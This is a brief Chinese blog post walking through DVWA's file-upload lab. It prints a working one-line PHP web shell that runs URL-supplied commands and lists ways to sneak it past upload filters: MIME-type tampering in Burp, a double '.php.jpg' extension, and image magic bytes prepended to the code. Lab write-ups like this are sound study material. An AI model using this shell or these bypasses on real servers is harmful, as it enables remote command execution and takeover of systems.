DVWA--文件上传
开门见山
1. 准备一个shell
<?php echo shell_exec($_GET['cmd']);?>
2. 上传文件
3. 利用shell
4. Burp抓包,1是文件大小,2是文件类型
5. mimetype判断文件类型
6. 使用1.php.jpg 绕过一些文件后缀检查
7. 图片1代码前几个字节标志文件的类型(jpg或者png),可以删除后面的内容,并替换成shell代码<?php echo shell_exec($_GET['cmd']);?>
作者:joker0xxx3
本文版权归作者和博客园共有,任何人或团体、机构全部转载或者部分转载、摘录,请在文章明显位置注明作者和原文链接。 否则保留追究法律责任的权利。